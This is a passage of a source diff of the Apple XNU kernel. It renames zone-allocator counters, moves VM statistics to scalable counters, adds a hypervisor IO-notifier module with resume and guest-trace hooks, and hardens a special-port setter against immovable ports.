|| defined(__arm64__) */ + +#else /* CONFIG_KDP_INTERACTIVE_DEBUGGING */ + + PEHaltRestart(kPEPanicDiagnosticsDone); + #endif /* CONFIG_KDP_INTERACTIVE_DEBUGGING */ if (!panicDebugging) { @@ -1565,10 +1578,6 @@ extern unsigned int inuse_ptepages_count; extern long long alloc_ptepages_count; #endif -extern boolean_t panic_include_zprint; -extern mach_memory_info_t *panic_kext_memory_info; -extern vm_size_t panic_kext_memory_size; - __private_extern__ void panic_display_zprint(void) { @@ -1579,10 +1588,10 @@ panic_display_zprint(void) zone_index_foreach(i) { if (ml_nofault_copy((vm_offset_t)&zone_array[i], (vm_offset_t)&zone_copy, sizeof(struct zone)) == sizeof(struct zone)) { - if (zone_copy.page_count > atop(1024 * 1024)) { + if (zone_copy.z_wired_cur > atop(1024 * 1024)) { paniclog_append_noflush("%-8s%-20s %10llu %10lu\n", zone_heap_name(&zone_copy), - zone_copy.z_name, ptoa_64(zone_copy.page_count), + zone_copy.z_name, (uint64_t)zone_size_wired(&zone_copy), (uintptr_t)zone_size_free(&zone_copy)); } } 
@@ -1623,8 +1632,6 @@ panic_display_ecc_errors(void) #endif /* CONFIG_ECC_LOGGING */ #if CONFIG_ZLEAKS -extern boolean_t panic_include_ztrace; -extern struct ztrace* top_ztrace; void panic_print_symbol_name(vm_address_t search); /* diff --git a/osfmk/kern/debug.h b/osfmk/kern/debug.h index fe3d5eed2..c9550cfd7 100644 --- a/osfmk/kern/debug.h +++ b/osfmk/kern/debug.h @@ -286,6 +286,7 @@ __options_decl(microstackshot_flags_t, uint32_t, { #define KF_INTERRUPT_MASKED_DEBUG_OVRD (0x40) #define KF_TRAPTRACE_OVRD (0x80) #define KF_IOTRACE_OVRD (0x100) +#define KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD (0x200) boolean_t kern_feature_override(uint32_t fmask); diff --git a/osfmk/kern/exception.c b/osfmk/kern/exception.c index 91c688db5..2060dc2a1 100644 --- a/osfmk/kern/exception.c +++ b/osfmk/kern/exception.c @@ -76,7 +76,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/kern/gzalloc.c b/osfmk/kern/gzalloc.c index ff7dec6bc..54ec12be2 100644 --- a/osfmk/kern/gzalloc.c +++ b/osfmk/kern/gzalloc.c @@ -204,11 +204,11 @@ gzalloc_empty_free_cache(zone_t zone) } /* Reset gzalloc_data. */ - lock_zone(zone); + zone_lock(zone); memcpy((void *)gzfc_copy, (void *)zone->gz.gzfc, gzfcsz); bzero((void *)zone->gz.gzfc, gzfcsz); zone->gz.gzfc_index = 0; - unlock_zone(zone); + zone_unlock(zone); /* Free up all the cached elements. */ for (uint32_t index = 0; index < gzfc_size; index++) { @@ -233,10 +233,10 @@ gzalloc_empty_free_cache(zone_t zone) */ /* Decrement zone counters. 
*/ - lock_zone(zone); - zone->countfree += freed_elements; - zone->page_count -= freed_elements; - unlock_zone(zone); + zone_lock(zone); + zone->z_elems_free += freed_elements; + zone->z_wired_cur -= freed_elements; + zone_unlock(zone); kmem_free(kernel_map, gzfc_copy, gzfcsz); } @@ -357,6 +357,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) vm_offset_t residue = rounded_size - zone_elem_size(zone); vm_offset_t gzaddr = 0; gzhdr_t *gzh, *gzhcopy = NULL; + bool new_va = false; if (!kmem_ready || (vm_page_zone == ZONE_NULL)) { /* Early allocations are supplied directly from the @@ -381,6 +382,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) panic("gzalloc: kernel_memory_allocate for size 0x%llx failed with %d", (uint64_t)rounded_size, kr); } + new_va = true; } if (gzalloc_uf_mode) { @@ -396,7 +398,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) addr = (gzaddr + residue); } - if (zone->zfree_clear_mem) { + if (zone->z_free_zeroes) { bzero((void *)gzaddr, rounded_size); } else { /* Fill with a pattern on allocation to trap uninitialized @@ -424,15 +426,15 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) *gzhcopy = *gzh; } - lock_zone(zone); + zone_lock(zone); assert(zone->z_self == zone); - zone->countfree--; - zone->page_count += 1; + zone->z_elems_free--; + if (new_va) { + zone->z_va_cur += 1; + } + zone->z_wired_cur += 1; zpercpu_get(zstats)->zs_mem_allocated += rounded_size; -#if ZALLOC_DETAILED_STATS - zpercpu_get(zstats)->zs_mem_wasted += rounded_size - zone_elem_size(zone); -#endif /* ZALLOC_DETAILED_STATS */ - unlock_zone(zone); + zone_unlock(zone); OSAddAtomic64((SInt32) rounded_size, &gzalloc_allocated); OSAddAtomic64((SInt32) (rounded_size - zone_elem_size(zone)), &gzalloc_wasted); @@ -468,7 +470,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) } if (gzfc_size && gzalloc_dfree_check) { - lock_zone(zone); + zone_lock(zone); 
assert(zone->z_self == zone); for (uint32_t gd = 0; gd < gzfc_size; gd++) { if (zone->gz.gzfc[gd] != saddr) { @@ -478,7 +480,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) "current free cache index: %d, freed index: %d", __func__, saddr, zone->gz.gzfc_index, gd); } - unlock_zone(zone); + zone_unlock(zone); } if (gzalloc_consistency_checks) { @@ -549,7 +551,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) free_addr = saddr; } - lock_zone(zone); + zone_lock(zone); assert(zone->z_self == zone); /* Insert newly freed element into the protected free element @@ -564,12 +566,12 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) } if (free_addr) { - zone->countfree++; - zone->page_count -= 1; + zone->z_elems_free++; + zone->z_wired_cur -= 1; } zpercpu_get(zstats)->zs_mem_freed += rounded_size; - unlock_zone(zone); + zone_unlock(zone); if (free_addr) { // TODO: consider using physical reads to check for diff --git a/osfmk/kern/host.c b/osfmk/kern/host.c index 5b60219f7..12a061aa5 100644 --- a/osfmk/kern/host.c +++ b/osfmk/kern/host.c @@ -109,11 +109,40 @@ #include -vm_statistics64_data_t PERCPU_DATA(vm_stat); -uint64_t PERCPU_DATA(vm_page_grab_count); +SCALABLE_COUNTER_DEFINE(vm_statistics_zero_fill_count); /* # of zero fill pages */ +SCALABLE_COUNTER_DEFINE(vm_statistics_reactivations); /* # of pages reactivated */ +SCALABLE_COUNTER_DEFINE(vm_statistics_pageins); /* # of pageins */ +SCALABLE_COUNTER_DEFINE(vm_statistics_pageouts); /* # of pageouts */ +SCALABLE_COUNTER_DEFINE(vm_statistics_faults); /* # of faults */ +SCALABLE_COUNTER_DEFINE(vm_statistics_cow_faults); /* # of copy-on-writes */ +SCALABLE_COUNTER_DEFINE(vm_statistics_lookups); /* object cache lookups */ +SCALABLE_COUNTER_DEFINE(vm_statistics_hits); /* object cache hits */ +SCALABLE_COUNTER_DEFINE(vm_statistics_purges); /* # of pages purged */ +SCALABLE_COUNTER_DEFINE(vm_statistics_decompressions); /* # of pages decompressed */ 
+SCALABLE_COUNTER_DEFINE(vm_statistics_compressions); /* # of pages compressed */ +SCALABLE_COUNTER_DEFINE(vm_statistics_swapins); /* # of pages swapped in (via compression segments) */ +SCALABLE_COUNTER_DEFINE(vm_statistics_swapouts); /* # of pages swapped out (via compression segments) */ +SCALABLE_COUNTER_DEFINE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. */ +SCALABLE_COUNTER_DEFINE(vm_page_grab_count); host_data_t realhost; +static void +get_host_vm_stats(vm_statistics64_t out) +{ + out->zero_fill_count = counter_load(&vm_statistics_zero_fill_count); + out->reactivations = counter_load(&vm_statistics_reactivations); + out->pageins = counter_load(&vm_statistics_pageins); + out->pageouts = counter_load(&vm_statistics_pageouts); + out->faults = counter_load(&vm_statistics_faults); + out->cow_faults = counter_load(&vm_statistics_cow_faults); + out->lookups = counter_load(&vm_statistics_lookups); + out->hits = counter_load(&vm_statistics_hits); + out->compressions = counter_load(&vm_statistics_compressions); + out->decompressions = counter_load(&vm_statistics_decompressions); + out->swapins = counter_load(&vm_statistics_swapins); + out->swapouts = counter_load(&vm_statistics_swapouts); +} vm_extmod_statistics_data_t host_extmod_statistics; kern_return_t @@ -123,8 +152,6 @@ host_processors(host_priv_t host_priv, processor_array_t * out_array, mach_msg_t return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - unsigned int count = processor_count; assert(count != 0); @@ -402,19 +429,7 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty return KERN_FAILURE; } - host_vm_stat = *PERCPU_GET_MASTER(vm_stat); - - percpu_foreach_secondary(stat, vm_stat) { - vm_statistics64_data_t data = *stat; - host_vm_stat.zero_fill_count += data.zero_fill_count; - host_vm_stat.reactivations += data.reactivations; - host_vm_stat.pageins += data.pageins; - host_vm_stat.pageouts += 
data.pageouts; - host_vm_stat.faults += data.faults; - host_vm_stat.cow_faults += data.cow_faults; - host_vm_stat.lookups += data.lookups; - host_vm_stat.hits += data.hits; - } + get_host_vm_stats(&host_vm_stat); stat32 = (vm_statistics_t)info; @@ -427,11 +442,11 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty } } stat32->inactive_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_inactive_count); -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count); -#else +#else /* !XNU_TARGET_OS_OSX */ stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count); -#endif +#endif /* !XNU_TARGET_OS_OSX */ stat32->zero_fill_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.zero_fill_count); stat32->reactivations = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.reactivations); stat32->pageins = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.pageins); @@ -793,24 +808,7 @@ vm_stats(void *info, unsigned int *count) if (*count < HOST_VM_INFO64_REV0_COUNT) { return KERN_FAILURE; } - - host_vm_stat = *PERCPU_GET_MASTER(vm_stat); - - percpu_foreach_secondary(stat, vm_stat) { - vm_statistics64_data_t data = *stat; - host_vm_stat.zero_fill_count += data.zero_fill_count; - host_vm_stat.reactivations += data.reactivations; - host_vm_stat.pageins += data.pageins; - host_vm_stat.pageouts += data.pageouts; - host_vm_stat.faults += data.faults; - host_vm_stat.cow_faults += data.cow_faults; - host_vm_stat.lookups += data.lookups; - host_vm_stat.hits += data.hits; - host_vm_stat.compressions += data.compressions; - host_vm_stat.decompressions += data.decompressions; - host_vm_stat.swapins += data.swapins; - host_vm_stat.swapouts += data.swapouts; - } + get_host_vm_stats(&host_vm_stat); vm_statistics64_t stat = (vm_statistics64_t)info; @@ -827,11 +825,11 @@ vm_stats(void *info, unsigned int *count) } } stat->inactive_count = 
vm_page_inactive_count; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX stat->wire_count = vm_page_wire_count; -#else +#else /* !XNU_TARGET_OS_OSX */ stat->wire_count = vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count; -#endif +#endif /* !XNU_TARGET_OS_OSX */ stat->zero_fill_count = host_vm_stat.zero_fill_count; stat->reactivations = host_vm_stat.reactivations; stat->pageins = host_vm_stat.pageins; @@ -981,20 +979,6 @@ set_sched_stats_active(boolean_t active) return KERN_SUCCESS; } - -uint64_t -get_pages_grabbed_count(void) -{ - uint64_t pages_grabbed_count = 0; - - percpu_foreach(count, vm_page_grab_count) { - pages_grabbed_count += *count; - } - - return pages_grabbed_count; -} - - kern_return_t get_sched_statistics(struct _processor_statistics_np * out, uint32_t * count) { @@ -1290,6 +1274,10 @@ host_set_special_port_from_user(host_priv_t host_priv, int id, ipc_port_t port) return KERN_NO_ACCESS; } + if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } + return host_set_special_port(host_priv, id, port); } @@ -1415,8 +1403,6 @@ host_set_multiuser_config_flags(host_priv_t host_priv, uint32_t multiuser_config return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - /* * Always enforce that the multiuser bit is set * if a value is written to the commpage word. 
diff --git a/osfmk/kern/host_statistics.h b/osfmk/kern/host_statistics.h index 9d21a4a4c..d6e12f31f 100644 --- a/osfmk/kern/host_statistics.h +++ b/osfmk/kern/host_statistics.h @@ -38,25 +38,23 @@ #ifndef _KERN_HOST_STATISTICS_H_ #define _KERN_HOST_STATISTICS_H_ -#include -#include -#include -#include +#include -extern -uint64_t get_pages_grabbed_count(void); +SCALABLE_COUNTER_DECLARE(vm_statistics_zero_fill_count); /* # of zero fill pages */ +SCALABLE_COUNTER_DECLARE(vm_statistics_reactivations); /* # of pages reactivated */ +SCALABLE_COUNTER_DECLARE(vm_statistics_pageins); /* # of pageins */ +SCALABLE_COUNTER_DECLARE(vm_statistics_pageouts); /* # of pageouts */ +SCALABLE_COUNTER_DECLARE(vm_statistics_faults); /* # of faults */ +SCALABLE_COUNTER_DECLARE(vm_statistics_cow_faults); /* # of copy-on-writes */ +SCALABLE_COUNTER_DECLARE(vm_statistics_lookups); /* object cache lookups */ +SCALABLE_COUNTER_DECLARE(vm_statistics_hits); /* object cache hits */ +SCALABLE_COUNTER_DECLARE(vm_statistics_purges); /* # of pages purged */ +SCALABLE_COUNTER_DECLARE(vm_statistics_decompressions); /* # of pages decompressed */ +SCALABLE_COUNTER_DECLARE(vm_statistics_compressions); /* # of pages compressed */ +SCALABLE_COUNTER_DECLARE(vm_statistics_swapins); /* # of pages swapped in (via compression segments) */ +SCALABLE_COUNTER_DECLARE(vm_statistics_swapouts); /* # of pages swapped out (via compression segments) */ +SCALABLE_COUNTER_DECLARE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. 
*/ -PERCPU_DECL(vm_statistics64_data_t, vm_stat); -PERCPU_DECL(uint64_t, vm_page_grab_count); - -#define VM_STAT_INCR(event) \ -MACRO_BEGIN \ - os_atomic_inc(&PERCPU_GET(vm_stat)->event, relaxed); \ -MACRO_END - -#define VM_STAT_INCR_BY(event, amount) \ -MACRO_BEGIN \ - os_atomic_add(&PERCPU_GET(vm_stat)->event, amount, relaxed); \ -MACRO_END +SCALABLE_COUNTER_DECLARE(vm_page_grab_count); #endif /* _KERN_HOST_STATISTICS_H_ */ diff --git a/osfmk/kern/hv_io_notifier.c b/osfmk/kern/hv_io_notifier.c new file mode 100644 index 000000000..7f0938fa4 --- /dev/null +++ b/osfmk/kern/hv_io_notifier.c @@ -0,0 +1,274 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "hv_io_notifier.h" + +static LCK_GRP_DECLARE(ion_lock_grp, "io notifier"); + +typedef struct hv_ion_entry { + LIST_ENTRY(hv_ion_entry) list; + + uint64_t addr; + size_t size; + uint64_t value; + uint32_t flags; + + mach_port_t port; + mach_port_name_t port_name; +} hv_ion_entry_t; + +LIST_HEAD(io_notifier_list, hv_ion_entry); + +struct hv_ion_grp { + struct io_notifier_list list; + lck_rw_t lock; +}; + +/* + * Lookup a matching notifier and return it. + */ +static hv_ion_entry_t * +hv_io_notifier_grp_lookup(const hv_ion_grp_t *grp, const hv_ion_entry_t *key) +{ + hv_ion_entry_t *ion = NULL; + + LIST_FOREACH(ion, &grp->list, list) { + if (ion->addr != key->addr) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != key->size) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != key->value) { + continue; + } + + if (ion->port_name != key->port_name) { + continue; + } + + if (ion->flags != key->flags) { + continue; + } + + return ion; + } + + return NULL; +} + +/* + * Add a new notifier. + * Return KERN_SUCCESS if the notifier was added, an error otherwise. 
+ */ +kern_return_t +hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *notifier) +{ + hv_ion_entry_t *ion = NULL; + + ion = kalloc(sizeof(*ion)); + if (ion == NULL) { + return KERN_RESOURCE_SHORTAGE; + } + + ion->addr = notifier->addr; + ion->size = notifier->size; + ion->value = notifier->value; + ion->flags = notifier->flags; + ion->port_name = notifier->port_name; + + kern_return_t ret = ipc_object_copyin(current_task()->itk_space, + ion->port_name, MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&ion->port, 0, + NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); + if (ret != KERN_SUCCESS) { + kfree(ion, sizeof(*ion)); + return ret; + } + + lck_rw_lock_exclusive(&grp->lock); + + if (hv_io_notifier_grp_lookup(grp, ion) != NULL) { + lck_rw_done(&grp->lock); + ipc_port_release_send(ion->port); + kfree(ion, sizeof(*ion)); + return KERN_FAILURE; + } + + LIST_INSERT_HEAD(&grp->list, ion, list); + + lck_rw_done(&grp->lock); + + return KERN_SUCCESS; +} + +/* + * Remove and free a notifier. + * Return KERN_SUCCESS if the notifier was removed, an error otherwise. + */ +kern_return_t +hv_io_notifier_grp_remove(hv_ion_grp_t *grp, const hv_ion_t *notifier) +{ + hv_ion_entry_t ion = {}; + hv_ion_entry_t *entry = NULL; + + ion.addr = notifier->addr; + ion.size = notifier->size; + ion.value = notifier->value; + ion.flags = notifier->flags; + ion.port_name = notifier->port_name; + + lck_rw_lock_exclusive(&grp->lock); + + entry = hv_io_notifier_grp_lookup(grp, &ion); + if (entry == NULL) { + lck_rw_done(&grp->lock); + return KERN_FAILURE; + } + + LIST_REMOVE(entry, list); + + lck_rw_done(&grp->lock); + + ipc_port_release_send(entry->port); + kfree(entry, sizeof(*entry)); + + return KERN_SUCCESS; +} + +/* + * Find matching notifiers and notify the port. + * Returns KERN_SUCCESS if no errors occurred when sending notifications and at + * least one notification was sent. 
+ */ +kern_return_t +hv_io_notifier_grp_fire(hv_ion_grp_t *grp, uint64_t addr, size_t size, + uint64_t value) +{ + kern_return_t kr = KERN_FAILURE; + hv_ion_entry_t *ion = NULL; + bool fired = false; + + lck_rw_lock_shared(&grp->lock); + + LIST_FOREACH(ion, &grp->list, list) { + if (ion->addr != addr) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != size) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != value) { + continue; + } + + hv_ion_message_t msg = { + .header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0), + .header.msgh_size = sizeof(msg), + .header.msgh_remote_port = ion->port, + .header.msgh_local_port = MACH_PORT_NULL, + .header.msgh_voucher_port = MACH_PORT_NULL, + .header.msgh_id = 0, + + .addr = addr, + .size = size, + .value = value, + }; + + kr = mach_msg_send_from_kernel_with_options(&msg.header, sizeof(msg), + MACH_SEND_TIMEOUT, MACH_MSG_TIMEOUT_NONE); + + /* + * A timeout will occur when the queue is full. Ignore it if so + * configured. + */ + if (kr == MACH_SEND_TIMED_OUT && !(ion->flags & kHV_ION_EXIT_FULL)) { + kr = MACH_MSG_SUCCESS; + } + + if (kr != MACH_MSG_SUCCESS) { + fired = false; + break; + } + + fired = true; + } + + lck_rw_done(&grp->lock); + return fired ? 
KERN_SUCCESS : KERN_FAILURE; +} + +kern_return_t +hv_io_notifier_grp_alloc(hv_ion_grp_t **grp_p ) +{ + hv_ion_grp_t *grp = kalloc(sizeof(*grp)); + + if (grp == NULL) { + return KERN_RESOURCE_SHORTAGE; + } + bzero(grp, sizeof(*grp)); + + lck_rw_init(&grp->lock, &ion_lock_grp, LCK_ATTR_NULL); + + *grp_p = grp; + return KERN_SUCCESS; +} + +void +hv_io_notifier_grp_free(hv_ion_grp_t **grp_p) +{ + hv_ion_grp_t *grp = *grp_p; + + while (!LIST_EMPTY(&grp->list)) { + hv_ion_entry_t *ion = LIST_FIRST(&grp->list); + + LIST_REMOVE(ion, list); + + ipc_port_release_send(ion->port); + kfree(ion, sizeof(*ion)); + } + + lck_rw_destroy(&grp->lock, &ion_lock_grp); + + kfree(grp, sizeof(*grp)); + + *grp_p = NULL; +} diff --git a/osfmk/kern/hv_io_notifier.h b/osfmk/kern/hv_io_notifier.h new file mode 100644 index 000000000..cd50a3f04 --- /dev/null +++ b/osfmk/kern/hv_io_notifier.h @@ -0,0 +1,74 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. 
+ * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#pragma once + +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +enum { + kHV_ION_NONE = (0u << 0), + kHV_ION_ANY_VALUE = (1u << 1), + kHV_ION_ANY_SIZE = (1u << 2), + kHV_ION_EXIT_FULL = (1u << 3), +}; + +#ifdef KERNEL_PRIVATE + +typedef struct { + mach_msg_header_t header; + uint64_t addr; + uint64_t size; + uint64_t value; +} hv_ion_message_t; + +typedef struct { + uint64_t addr; + uint64_t size; + uint64_t value; + uint32_t port_name; + uint32_t flags; +} hv_ion_t; + +typedef struct hv_ion_grp hv_ion_grp_t; + +extern kern_return_t hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *); +extern kern_return_t hv_io_notifier_grp_remove(hv_ion_grp_t *, const hv_ion_t *); +extern kern_return_t hv_io_notifier_grp_fire(hv_ion_grp_t *, uint64_t, size_t, uint64_t); +extern kern_return_t hv_io_notifier_grp_alloc(hv_ion_grp_t **); +extern void hv_io_notifier_grp_free(hv_ion_grp_t **); + +#endif /* KERNEL_PRIVATE */ + +#ifdef __cplusplus +} +#endif diff --git a/osfmk/kern/hv_support_kext.c b/osfmk/kern/hv_support_kext.c index ca9054202..39ef71694 100644 --- a/osfmk/kern/hv_support_kext.c +++ b/osfmk/kern/hv_support_kext.c @@ -33,6 +33,7 @@ #include #include #include +#include #if defined(__x86_64__) && CONFIG_VMX #include @@ -52,6 +53,8 @@ hv_callbacks_t hv_callbacks = { .thread_destroy = NULL, /* thread is being destroyed */ .task_destroy = NULL, /* task is being destroyed */ .volatile_state = NULL, /* thread state is becoming 
volatile */ + .resume = NULL, /* system is being resumed */ + .memory_pressure = NULL,/* (unused) */ }; /* trap tables for hv_*_trap syscalls */ @@ -192,7 +195,8 @@ hv_release_callbacks(void) .suspend = NULL, .thread_destroy = NULL, .task_destroy = NULL, - .volatile_state = NULL + .volatile_state = NULL, + .resume = NULL, }; hv_callbacks_enabled = 0; @@ -208,6 +212,15 @@ hv_suspend(void) } } +/* system resume notification */ +void +hv_resume(void) +{ + if (hv_callbacks_enabled && hv_callbacks.resume) { + hv_callbacks.resume(); + } +} + /* dispatch hv_task_trap/hv_thread_trap syscalls to trap handlers, * fail for invalid index or absence of trap handlers, trap handler is * responsible for validating targets */ @@ -244,10 +257,30 @@ void hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs) { DTRACE_HV2(guest__enter, uint32_t, vcpu_id, uint64_t *, vcpu_regs); + + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_START, vcpu_id); } void -hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs) +hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t reason) { + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id, + reason); + DTRACE_HV2(guest__exit, uint32_t, vcpu_id, uint64_t *, vcpu_regs); } + +void +hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t failure, + uint32_t error) +{ + /* + * An error indicates that the guest enter failed so there will be no + * guest exit. Close the guest enter interval. 
+ */ + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id, + -1, failure, error); + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ERROR), vcpu_id, failure, error); + + DTRACE_HV3(guest__error, uint32_t, vcpu_id, uint64_t *, vcpu_regs, uint32_t, failure); +} diff --git a/osfmk/kern/hv_support_kext.h b/osfmk/kern/hv_support_kext.h index 0b7fa64d1..a744516a9 100644 --- a/osfmk/kern/hv_support_kext.h +++ b/osfmk/kern/hv_support_kext.h @@ -36,6 +36,7 @@ extern "C" { #include #include #include +#include typedef enum { HV_DEBUG_STATE @@ -60,6 +61,8 @@ typedef struct { void (*thread_destroy)(void *vcpu); void (*task_destroy)(void *vm); void (*volatile_state)(void *vcpu, int state); +#define HV_CALLBACKS_RESUME_DEFINED 1 + void (*resume)(void); void (*memory_pressure)(void); } hv_callbacks_t; @@ -79,13 +82,17 @@ extern void hv_release_traps(hv_trap_type_t trap_type); extern kern_return_t hv_set_callbacks(hv_callbacks_t callbacks); extern void hv_release_callbacks(void); extern void hv_suspend(void); +extern void hv_resume(void); extern kern_return_t hv_task_trap(uint64_t index, uint64_t arg); extern kern_return_t hv_thread_trap(uint64_t index, uint64_t arg); extern boolean_t hv_ast_pending(void); extern void hv_port_notify(mach_msg_header_t *msg); extern void hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs); -extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs); +extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs, + uint32_t reason); +extern void hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs, + uint32_t failure, uint32_t error); #if defined(__cplusplus) } diff --git a/osfmk/kern/hvg_hypercall.h b/osfmk/kern/hvg_hypercall.h new file mode 100644 index 000000000..d559fa340 --- /dev/null +++ b/osfmk/kern/hvg_hypercall.h @@ -0,0 +1,106 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. 
+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
